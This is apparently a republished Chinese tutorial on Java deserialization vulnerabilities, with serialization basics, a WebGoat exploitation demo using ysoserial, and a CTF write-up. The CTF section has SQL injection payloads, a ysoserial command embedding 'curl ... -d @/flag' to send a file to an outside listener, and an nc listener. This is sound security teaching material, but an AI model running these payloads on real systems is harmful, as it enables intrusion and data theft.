IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> Java知识库 -> web安全Java反序列化 -> 正文阅读

[Java知识库]web安全Java反序列化

一、Java反序列化的认识

1.漏洞原理
如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。

2.应用场景
一般来说,服务器启动后,就不会再关闭了,但是如果逼不得已需要重启,而用户会话还在进行相应的操作,这时就需要使用序列化将session信息保存起来放在硬盘,服务器重启后,又重新加载。这样就保证了用户信息不会丢失,实现永久化保存。

在很多应用中,需要对某些对象进行序列化,让它们离开内存空间,入住物理硬盘,以便减轻内存压力或便于长期保存。比如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一些seesion先序列化到硬盘中,等要用了,再把保存在硬盘中的对象还原到内存中。

例子: 淘宝每年都会有定时抢购的活动,很多用户会提前登录等待,长时间不进行操作,一致保存在内存中,而到达指定时刻,几十万用户并发访问,就可能会有几十万个session,内存可能吃不消。这时就需要进行对象的活化、钝化,让其在闲置的时候离开内存,将信息保存至硬盘,等要用的时候,就重新加载进内存。

初步总结:Java 序列化和反序列化,其一,实现了数据的持久化,通过序列化可以把数据永久的保存在硬盘上;其二,利用序列化实现远程通信,即在网络上传递对象的字节序列。

3.序列化和反序列化
序列化:把对象转换成字节流,方便持久化保存
反序列化:把序列化后的字节流,还原成对象处理

序列化是将对象状态转换为可保持或传输的格式的过程。与序列化相对的是反序列化,它将流转换为对象。
这两个过程结合起来,可以轻松地存储和传输数据,这就是序列化的意义所在

4.用途

把对象的字节序列永久地保存到硬盘上,通常存放在一个文件中;在网络上传送对象的字节序列。

函数接口类:
Java: Serializable Externalizable接口、fastjson、jackson、gson
PHP: serialize()、 unserialize()
Python:pickle

数据出现地:
http参数,cookie,sesion,存储方式可能是base64(rO0),压缩后的base64(H4s),MII等
Servlets http,Sockets,Session管理器,包含的协议就包括:JMX,RMI,JMS,JND1等(\xac\Xed)
xm lXstream,XmldEcoder等(http Body:Content-type: application/xml)
json(jackson,fastjson)http请求中包含

发现点:黑盒-数据出现地&白盒-函数接口类
利用点:集成库生成器-ysoserial&单点利用脚本工具

二、Java反序列化操作

实现方法
1.java.io.ObjectOutputStream
2.java.io.ObjectInputStream

序列化:ObjectOutputStream类 --> writeObject()

该方法对参数指定的obj对象进行序列化,把字节序列写到一个目标输出流中
按Java的标准约定是给文件一个.ser扩展名

反序列化: ObjectInputStream类 --> readObject()

该方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回。

代码如下:

package java_Serializable;

import java.io.*;

/*
import java.io.ObjectOutputStream;
import java.io.ObjectInputStream;
import java.io.FileOutputStream;
import java.io.FileInputStream;
*/

public class Java_Test{

    public static void main(String args[]) throws Exception {
        String obj = "ls ";

        // 将序列化对象写入文件object.txt中
        FileOutputStream fos = new FileOutputStream("aa.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        os.writeObject(obj);
        os.close();

        // 从文件object.txt中读取数据
        FileInputStream fis = new FileInputStream("aa.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        // 通过反序列化恢复对象obj
        String obj2 = (String)ois.readObject();
        System.out.println(obj2);
        ois.close();
    }

}

先通过输入流创建一个文件,再调用ObjectOutputStream类的 writeObject方法把序列化的数据写入该文件;然后调用ObjectInputStream类的readObject方法反序列化数据并打印数据内容。

对象序列化包括如下步骤:
  1) 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流;
  2) 通过对象输出流的writeObject()方法写对象。

对象反序列化的步骤如下:
  1) 创建一个对象输入流,它可以包装一个其他类型的源输入流,如文件输入流;
  2) 通过对象输入流的readObject()方法读取对象。
  
代码如下:

package java_Serializable;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.text.MessageFormat;
import java.io.Serializable;

class Person implements Serializable {

    /**
     * 序列化ID
     */
    private static final long serialVersionUID = -5809782578272943999L;


    private int age;
    private String name;
    private String sex;

    public int getAge() {
        return age;
    }

    public String getName() {
        return name;
    }

    public String getSex() {
        return sex;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public void setName(String name) {
        this.name = name;
    }

    public void setSex(String sex) {
        this.sex = sex;
    }
}

/**
 * <p>ClassName: SerializeAndDeserialize<p>
 * <p>Description: 测试对象的序列化和反序列<p>
 */
class SerializeDeserialize_readObject {

    public static void main(String[] args) throws Exception {
        SerializePerson();//序列化Person对象
        Person p = DeserializePerson();//反序列Perons对象
        System.out.println(MessageFormat.format("name={0},age={1},sex={2}",
                p.getName(), p.getAge(), p.getSex()));
    }

    /**
     * MethodName: SerializePerson
     * Description: 序列化Person对象
     */
    private static void SerializePerson() throws FileNotFoundException,
            IOException {
        Person person = new Person();
        person.setName("ssooking");
        person.setAge(20);
        person.setSex("男");
        // ObjectOutputStream 对象输出流,将Person对象存储到Person.txt文件中,完成对Person对象的序列化操作
        ObjectOutputStream oo = new ObjectOutputStream(new FileOutputStream(
                new File("Person.txt")));
        oo.writeObject(person);
        System.out.println("Person对象序列化成功!");
        oo.close();
    }

    /**
     * MethodName: DeserializePerson
     * Description: 反序列Perons对象
     */
    private static Person DeserializePerson() throws Exception, IOException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(new File("Person.txt")));
        /*
            FileInputStream fis = new FileInputStream("Person.txt"); 
            ObjectInputStream ois = new ObjectInputStream(fis);
        */
        Person person = (Person) ois.readObject();
        System.out.println("Person对象反序列化成功!");
        return person;
    }

}
创建一个Person接口,然后写两个方法:
序列化方法:创建一个Person实例,调用函数为其三个成员变量赋值,通过writeObject方法把该对象序列化,写入Person.txt文件中
反序列化方法:调用readObject方法,返回一个经过饭序列化处理的对象
在测试主类里面,我们先序列化Person实例对象,然后又反序列化该对象,最后调用函数获取各个成员变量的值。

具体代码原理参考:https://www.jianshu.com/p/4060bb2e24cb

运行截图
在这里插入图片描述
写入Person.txt的序列化
在这里插入图片描述
这就是Java序列化与反序列化的过程,将序列化对象写入文件中,再文件中读取数据,最后通过反序列化恢复对象

三、发现&利用-WebGoat&Ysoserial&Payload

WebGoat 是由OWASP维护的故意不安全的 Web 应用程序,旨在教授 Web 应用程序安全课程。
该程序演示了常见的服务器端应用程序缺陷。这些练习旨在供人们学习应用程序安全和渗透测试技术。

最新版本的 WebGoat 需要 Java 15 或更高版本。默认情况下,WebGoat 和 Webwolf 在端口 8080、9000 和 9090 上启动,环境变量 WEBGOAT_PORT、WEBGOAT_HSQLPORT 和 WEBWOLF_PORT 可以设置不同的值。

WebGoat:https://github.com/WebGoat/WebGoat/releases/tag/v8.1.0
Ysoserial:https://github.com/frohoff/ysoserial
Java反序列化备忘录:https://xz.aliyun.com/t/2042

运行WebGoat

java -jar webgoat-server-8.1.0.jar //把webgoat-server-8.1.0.jar 放在jdk bin目录下

在这里插入图片描述

访问:http://127.0.0.1:8080/WebGoat/login

在这里插入图片描述
注册好之后的页面
在这里插入图片描述
来到漏洞的利用点
在这里插入图片描述
在这里插入图片描述
JAVAWEB特征可以作为序列化的标志参考:
一段数据以rO0AB开头,你基本可以确定这串就是JAVA序列化base64加密的数据。
或者如果以aced开头,那么他就是这一段java序列化的16进制。

那么通过观察发现rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l这个字符串就是JAVA序列化base64加密的数据,这种加密是为了不让数据过于明显,解决了一个安全的问题

漏洞利用:
首先使用到的工具ysoserial,ysoserial集合了各种java反序列化payload;运行如下:
在这里插入图片描述
利用的时候: 1.找到需要的payload 2.查看对方jar包的组件可能存在的反序列化漏洞

反编译webgoat-server的jar包(webgoat),查看BOOT-INF/lib/insecure-deserialization-8.0.0.M25.jar存在反序列化漏洞,且编码是base64url
在这里插入图片描述
在这里插入图片描述

再查看jar包的组件,groovy,hibernate-core,spring-core可能存在反序列化漏洞
在这里插入图片描述
在这里插入图片描述

配合jar包生成payload: java -Dhibernate5 -cp hibernate-core-5.4.9.Final.jar;ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload Hibernate1 "calc.exe" > x.bin
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
换Base64编码

import base64
file = open("x.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

最终将Base64编码的payload拿到输入框执行反弹计算器
在这里插入图片描述

四、CTF网鼎杯2020 朱雀组Think Java(JAVA反序列化)

打开题目,有附件可以下载,直接下载出来拖到IDEA分析
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在/common/test/sqlDict有个注入,这里的dbName参数可控,参数没有任何过滤带入到数据库查询,存在SQL注入漏洞。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
找到这是一个JDBC sql注入构造payload如下:

POST /common/test/sqlDict
dbName=myapp?a=' union select (select name from user)#  //myapp库名
dbName=myapp?a=' union select (select pwd from user)#

在这里插入图片描述
在这里插入图片描述

注入得到账号:admin 密码:admin@Rrrr_ctf_asde
然后有了账号密码需要找登陆的地方,通过信息收集发现swagger-ui api接口
在这里插入图片描述
Swagger UI:提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。

接着url地址后面加上swagger-ui.html 访问如下:
在这里插入图片描述
找到接口我们尝试登陆,登陆成功后发现了一个字符串开头为rO0A,这是一串经过base64加密的java序列化,说明这里存在java反序列化的操作
在这里插入图片描述

在这里插入图片描述
接着我们解码康康

rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu

先base64解码
在这里插入图片描述

发现还进行了十六进制加密,再十六进制解密
在这里插入图片描述
在这里插入图片描述
解密后数据中包含帐号等信息,通过接口/common/user/current分析可知数据有接受,说明存在反序列化操作,将恶意代码进行序列化后进行后续操作,利用ysoserial进行序列化生成

java -jar ysoserial.jar ROME "curl http://172.16.175.49:4444 -d @/flag" > flag.bin

再利用py2脚本进行反序列化数据的提取

import base64
file = open("flag.bin","rb")
now = file.read()
ba = base64.b64encode(now)
print(ba)
file.close()

在这里插入图片描述
这样直接打payload即可,数据包直接请求获取进行反序列数据加载操作
服务器执行:nc -lvvp 4444 监听数据

参考:https://www.cnblogs.com/h3zh1/p/12914439.html

在这里插入图片描述

  Java知识库 最新文章
计算距离春节还有多长时间
系统开发系列 之WebService(spring框架+ma
springBoot+Cache(自定义有效时间配置)
SpringBoot整合mybatis实现增删改查、分页查
spring教程
SpringBoot+Vue实现美食交流网站的设计与实
虚拟机内存结构以及虚拟机中销毁和新建对象
SpringMVC---原理
小李同学: Java如何按多个字段分组
打印票据--java
上一篇文章      下一篇文章      查看所有文章
加:2021-07-16 11:08:15  更:2021-07-16 11:08:19 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/18 18:14:59-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码